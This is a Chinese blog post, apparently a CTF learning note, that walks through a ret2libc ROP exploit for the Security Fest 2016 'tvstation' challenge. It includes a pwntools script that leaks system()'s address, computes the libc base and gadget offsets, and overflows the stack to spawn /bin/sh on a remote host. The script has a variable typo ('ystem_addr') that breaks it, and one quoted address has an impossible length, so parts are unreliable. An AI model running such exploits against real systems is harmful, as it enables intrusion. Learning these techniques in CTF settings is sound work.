CTF笔记:ROP技术

已于 2022-05-19 00:56:24 修改
阅读量669 收藏 2
点赞数
分类专栏: 学习笔记 文章标签: 安全 web安全
于 2022-05-19 00:44:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37431937/article/details/124854387
版权

CTF 笔记案例主要来源于UUCTF等平台,通过复现案例等相关内容了解具体原理,涉及内容较简单,相关案例文章也较多,学习难度较小,通过IDA checksec readelf 以及linux 平台动态GUI调试工具EDB等分析程序功能

示例:Security Fest CTF 2016-tvstation

主程序执行情况,我们看到主要执行函数menu();

执行程序,菜单功能模块选项,运行程序发现菜单只有3个选项,但实际在IDA分析可见有选项4.

并且选项4中debug()函数输出system在内存中地址

查看返回值debug_func()函数,明显存在溢出点。

.text节(Section)属于第一个LOAD段(Segment),这个段的文件长度和内存长度是一样的,也就是说所有的代码都是原样映射到内存中,代码之间的相对偏移是不会改变的。由于前面的PHDR, INTERP两个段也是原样映射,所以在IDA里看到的system首地址距离文件头的地址偏移和运行时的偏移是一样的

 

在这个libc中system函数首地址是0x456a0,即从文件的开头数0x456a0个字节到达system函数,调试程序得到systemsystem在内存中的地址是0x7f1a3887d98a0,

0x7f1a3887d98a0-0x456a0=7F1A388794200

在libc中存在字符串”/bin/sh”,该字符串位于.data节,根据同样的原理我们也可以得知这个字符串距libc首地址的偏移

 还有用来传参的gadget :pop rdi; ret

exp:

#!/usr/bin/python
#coding:utf-8
from pwn import *
io=remote('ip',port)
io.recvuntil(":")
io.sendline('4') #jump to hide options
io.recvuntil("@0x")
ystem_addr = int(io.recv(12), 16) #读取输出的system函数在内存中的地址#读取输出的system函数在内存中的地址
libc_start=system_addr-0x456a0 #根据偏移计算libc在内存中的首地址
pop_rdi_addr = libc_start + 0x1fd7a #pop rdi; ret 在内存中的地址,给system函数传参
binsh_addr = libc_start + 0x18ac40 #"/bin/sh"字符串在内存中的地址
payload = ""
payload += 'A'*40 #padding
payload += p64(pop_rdi_addr) #pop rdi; ret
payload += p64(binsh_addr) #system函数参数
payload += p64(system_addr) #调用system()执行system("/bin/sh")
io.sendline(payload)
io.interactive()

PwnGuo
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF神器:自动爆破PNG图片宽高并一键修复工具
12-29
总的来说,这个神器结合了编程技术CTF挑战的特点,提供了一种自动化的方式来处理特定类型的图片隐藏信息问题。对于参加CTF比赛的选手来说,掌握类似工具的使用和背后的原理,无疑会增强他们的解题能力。
CTF-PWN笔记(一)-- 栈溢出 之 基础ROP
CK_0ff的博客
01-09 4366
文章目录栈linux内存布局原理文件保护机制CanaryNXPIE(ASLR)RELRO简单的栈溢出(ret2txt)ret2shellcode 栈 栈是一种典型的后进先出 (Last in First Out) 的数据结构,其操作主要有压栈 (push) 与出栈 (pop) 两种操作,如下图所示(维基百科)。两种操作都操作栈顶,当然,它也有栈底。 高级语言在运行时都会被转换为汇编程序,在汇编程序运行过程中,充分利用了这一数据结构。每个程序在运行时都有虚拟地址空间,其中某一部分就是该程序对应的栈,用于保存
CTF竞赛 -- 栈溢出与ROP
yyyyyybw的博客
09-15 236
栈溢出攻击与ROP技术CTF竞赛中的重要议题,本文通过理论解释和实际代码示例,向读者展示了它们的原理与应用。栈溢出攻击是一种经典的漏洞利用技术,其基本原理是利用程序中的缓冲区溢出错误,将恶意代码注入到程序的执行流程中。一般情况下,栈是用于存储局部变量、返回地址等信息的区域,但如果程序未正确验证输入的大小,攻击者可以输入超出缓冲区边界的数据,覆盖控制流信息。ROP的核心思想是将栈上的返回地址指向程序中的某些"小片段",这些片段以一系列指令结尾于ret(返回)指令,执行后会将控制权交还给栈上的下一个地址。
CTFHUB技能树——Pwn前置技能学习
最新发布
QX_XDE的博客
04-24 615
汇编指令讲解
CTF-PWN-栈溢出-中级ROP-【栈迁移】
llovewuzhengzi的博客
01-09 1303
所以此时的gadget应该是能够进行栈迁移的,即为待会要改到的rsp值+修改参数的gadget+read函数+leave_ret,此时由于想直接用程序内的gadget来构造参数,此时可以以原函数开始准备read函数调用的地址作为调用read函数地址,此时可以参数构造就不要担心需要找gadget或者直接利用read函数后rdi rsi rdx没有被修改的特点从而只修改rsi即可,正好存在这样的gadget(main函数ret结束前调用的最后一个函数是向bss段输入数据)。
CTF-PWN-栈溢出-中级ROP-【BROP-2】
llovewuzhengzi的博客
12-26 1149
此时将输出函数puts在got表中的地址作为参数,调用puts函数,从而得到puts的真实地址,进而得到libc基地址。注意此时不要关闭传输通道,不然进程再次重启,对应的puts的真实地址会改变,其libc基地址也会改变,所以此时得到puts函数真实地址后跳转到主函数(返回地址是stop_addr),然后计算得到libc基地址和system地址和/bin/sh的地址,然后再次输入构造的ROP链即getshellput_got_addr=0x601018 # 查看binary_file找到got表的地址。
CTF-PWN-callme32 [ROP+栈溢出]
SuperGate的博客
08-13 896
首先发现在pwnme函数中有一个明显的缓冲区溢出,长度为40,经调试发现填入44长度的垃圾信息即可填入shellcode ida发现一个重要函数如下: 点入后发现这三个函数为系统级调用。正好题目给了我们一个.so文件。进入查看,发现有这三个函数的反编译。依次是将加密后的flag通过key1,key2解密。调用顺序应该是callme_one -> callme_two -> c...
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境0x00 前言CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。0x01 搭建环境使用CTFhub中的环境的前提条件需要在本地...
CTF笔记.one
05-06
CTF笔记,注意是.one格式,里面详细记录了很多笔记,希望对各位学习有帮助!
CTF赛题:将txt文件提取转换为图片(二维码)
10-20
提取txt文档中的大量0和1,生成二维码
De1CTF2020:De1CTF2020
02-18
【De1CTF2020:一场技术的盛宴】 De1CTF2020是一场备受瞩目的网络安全竞赛,通常在CTF(Capture The Flag)领域内举办。CTF比赛是信息安全爱好者和专业人士展示技能、学习新知识并互相交流的平台。这种竞赛涵盖了多...
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
ctfwiki---基本ROP
xuqi7
11-29 2148
ctfwiki,基本ROP(Return Oriented Programming)复现
ctf-wiki 基本ROP
农夫果园好好喝的博客
07-11 457
ret2text 原理:ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。 这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护。 流程...
CTFHUB-WriteUp】pwn技能树-栈溢出-Ret2VDSO
qq_39933891的博客
03-11 808
ops
CTFHUB技能树详解(最全、最细、最易懂)
it_wzb的博客
09-29 5392
最近闲的无聊,玩玩CTF吧,并把自己的解题思路分享给大家。大佬多指教。
64位栈溢出简单rop与简单例题的复现
goat_2003的博客
09-18 658
首先还是找到关键函数 可以看到有read栈溢出漏洞,有system函数,查看字符串,还可以看到"/bin/sh",既然这样,我们便可以一步到位直接通过rop将/bin/sh装入system函数中getshell。 如何通过rop实现传参呢?64位ELF是通过寄存器存放参数的,所以我们要想办法将/bin/sh放入rdi中并紧接着调用system函数。 那么该如何实现呢?我们假设一下,先通过pop edi将/bin/sh的地址压入edi中,然后再执行ret,并将此时的esp所指向栈空间的值改为system函数
[ctfhub.pwn] 第12-14题
weixin_52640415的博客
09-06 690
ctfhub.pwn习题集
ctf pwn 萌新学习记录 基本rop(题目来自Wiki)
weixin_73481933的博客
01-04 1304
此后又发现在 secure 函数又发现了存在调用system(“/bin/sh”) 的代码,那么如果我们直接控制程序返回至 0x0804863A,那么就可以得到系统的 shell 了。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。下面就是我们如何构造 payload 了,首先需要确定的是我们能够控制的内存的起始地址距离 main 函数的返回地址的字节数。发现错了(原因:IDE可能会把栈的长度测量错了)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值